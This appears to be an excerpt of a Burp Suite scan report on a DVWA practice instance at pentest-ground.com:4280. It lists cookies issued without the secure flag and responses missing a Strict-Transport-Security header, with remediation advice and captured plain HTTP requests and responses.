The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
Vulnerability classifications
8.1. https://pentest-ground.com:4280/
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/ |
Issue detail
The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request 1
GET / HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:30 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5930
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Set-Cookie: PHPSESSID=4e98789ed626867505827d1645104bbf; expires=Tue, 22 Oct 2024 09:38:30 GMT; Max-Age=86400; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Welcome :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="
...[SNIP]...
8.2. https://pentest-ground.com:4280/security.php
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/security.php |
Issue detail
The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request 1
POST /security.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=20f82cc3bfe2f59fa9f8dc5eaf0d9132
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/security.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 80
security=medium&seclev_submit=Submit&user_token=7878af9d1f476a29debc53d941ab743b
Response 1
HTTP/1.1 302 Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: security=medium; path=/
Location: /security.php
9. Strict Transport Security Misconfiguration
Previous
Next
There are 53 instances of this issue:
Issue background
The HTTP Strict Transport Security policy defines a timeframe where a browser must connect to the web server via HTTPS. Without a Strict Transport Security policy the web application may be vulnerable against several attacks:
- If the web application mixes usage of HTTP and HTTPS, an attacker can manipulate pages in the unsecured area of the application or change redirection targets in a manner that the switch to the secured page is not performed or done in a manner, that the attacker remains between client and server.
- If there is no HTTP server, an attacker in the same network could simulate a HTTP server and motivate the user to click on a prepared URL by a social engineering attack.
The protection is effective only for the given amount of time. Multiple occurrence of this header could cause undefined behaviour in browsers and should be avoided.
9.1. https://pentest-ground.com:4280/
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET / HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:30 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5930
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Set-Cookie: PHPSESSID=4e98789ed626867505827d1645104bbf; expires=Tue, 22 Oct 2024 09:38:30 GMT; Max-Age=86400; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Welcome :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="
...[SNIP]...
9.2. https://pentest-ground.com:4280/README.ar.md
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/README.ar.md |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /README.ar.md HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=492559470e1d1532b619f28972a798ef
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:46 GMT
Content-Type: text/markdown
Content-Length: 25027
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "61c3-60aa7c44ac3ca"
Accept-Ranges: bytes
# DAMN VULNERABLE WEB APPLICATION
.... Damn Vulnerable Web Application (DVWA) .... .......... ...... .... ............ .......... .......... .... PHP / MySQL. .......... .............. .... ........
...[SNIP]...
9.3. https://pentest-ground.com:4280/README.es.md
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/README.es.md |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /README.es.md HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=e3d105c12bab570377954ff8fef5161a
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:54 GMT
Content-Type: text/markdown
Content-Length: 21777
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "5511-60aa7c44ac3ca"
Accept-Ranges: bytes
Content-Language: es
# DAMN VULNERABLE WEB APPLICATION
Damn Vulnerable Web Application (DVWA) es una aplicaci..n web hecha en PHP/MySQL que es extremadamente vulnerable. Su principal objetivo es ayudar a profesionales de
...[SNIP]...
9.4. https://pentest-ground.com:4280/README.fa.md
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/README.fa.md |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /README.fa.md HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=f645cd9901dfcd217cc382a83297b7b7
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:51 GMT
Content-Type: text/markdown
Content-Length: 30612
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "7794-60aa7c44ac3ca"
Accept-Ranges: bytes
Content-Language: fa
# ................ ...... .............. ...................
................ ...... .............. ................... (DVWA).. .... ................ ...... .......... .... ................../.......
...[SNIP]...
9.5. https://pentest-ground.com:4280/README.fr.md
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/README.fr.md |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /README.fr.md HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=8b04c2a5e0f29ba02562bbe4b431aa36
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:50 GMT
Content-Type: text/markdown
Content-Length: 20674
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "50c2-60aa7c44ac3ca"
Accept-Ranges: bytes
Content-Language: fr
# Translation / Traduction
Philibert Gentil...@[Philibert-Gentil](https://github.com/Philibert-Gentil)
Vous pouvez me contacter en cas d'erreur de traduction / d'interpr..tation.
- - -
# DAMN VULNE
...[SNIP]...
9.6. https://pentest-ground.com:4280/README.pt.md
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/README.pt.md |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /README.pt.md HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d3e2bad7ac45eec22b45a259f5624a6f
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:53 GMT
Content-Type: text/markdown
Content-Length: 21239
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "52f7-60aa7c44ac3ca"
Accept-Ranges: bytes
Content-Language: pt
# DAMN VULNERABLE WEB APPLICATION
Damn Vulnerable Web Application (DVWA) .. um aplicativo web em PHP/MySQL que .. extremamente vulner..vel. Seu principal objetivo .. auxiliar profissionais de seguran
...[SNIP]...
9.7. https://pentest-ground.com:4280/README.tr.md
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/README.tr.md |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /README.tr.md HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=6c9595aea1e31eff4f63fb4bdd18a1f3
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:56 GMT
Content-Type: text/markdown
Content-Length: 19838
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "4d7e-60aa7c44ac3ca"
Accept-Ranges: bytes
Content-Language: tr
# DAMN VULNERABLE WEB APPLICATION
Damn Vulnerable Web Application (DVWA), son derece zafiyetli bir PHP/MySQL web uygulamas..d..r. Temel amac..; g..venlik uzmanlar..na, yeteneklerini ve ara..lar..n..
...[SNIP]...
9.8. https://pentest-ground.com:4280/README.zh.md
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/README.zh.md |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /README.zh.md HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=ebbb7d8c32683657d5128f2d3f90d743
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:48 GMT
Content-Type: text/markdown
Content-Length: 17394
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "43f2-60aa7c44ac3ca"
Accept-Ranges: bytes
# ......
.........@[inVains](https://github.com/inVains) @[songzy12](https://github.com/songzy12) @[cnskis](https://github.com/cnskis)
- - -
# ...... DAMN VULNERABLE WEB APPLICATION...DVWA...
Damn
...[SNIP]...
9.9. https://pentest-ground.com:4280/about.php
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/about.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /about.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=bd4354577682343786a08203c3601069
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:37 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5198
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>About :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="st
...[SNIP]...
9.10. https://pentest-ground.com:4280/compose.yml
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/compose.yml |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /compose.yml HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=4d986ec27a888ace189d8ceaa8016b47
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 404 Not Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:00 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 280
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apach
...[SNIP]...
9.11. https://pentest-ground.com:4280/config/config.inc.php
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/config/config.inc.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /config/config.inc.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=887b5206538ce1e025ee586761a3df33
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:57 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/8.3.12
9.12. https://pentest-ground.com:4280/docs/DVWA_v1.3.pdf
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/docs/DVWA_v1.3.pdf |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /docs/DVWA_v1.3.pdf HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=33b54a2ee3adcc13612ba6943ddba842
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php?doc=PDF
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:43 GMT
Content-Type: application/pdf
Content-Length: 422011
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "6707b-60aa7c44ae30b"
Accept-Ranges: bytes
%PDF-1.3
%...........
4 0 obj
<< /Length 5 0 R /Filter /FlateDecode >>
stream
x..V.n.0...+.(.,......-.^.6FrhzHT.qa....;......f....H.N....qFO...H..4..B.fN..@..VQ.%E...|q.1..o.....v%6K.T9;.Tk..Me]S...S.
...[SNIP]...
9.13. https://pentest-ground.com:4280/docs/graphics/docker/detail.png
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/docs/graphics/docker/detail.png |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /docs/graphics/docker/detail.png HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=71714f1a9cde023a53997f100bf78363
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:18 GMT
Content-Type: image/png
Content-Length: 164347
Connection: close
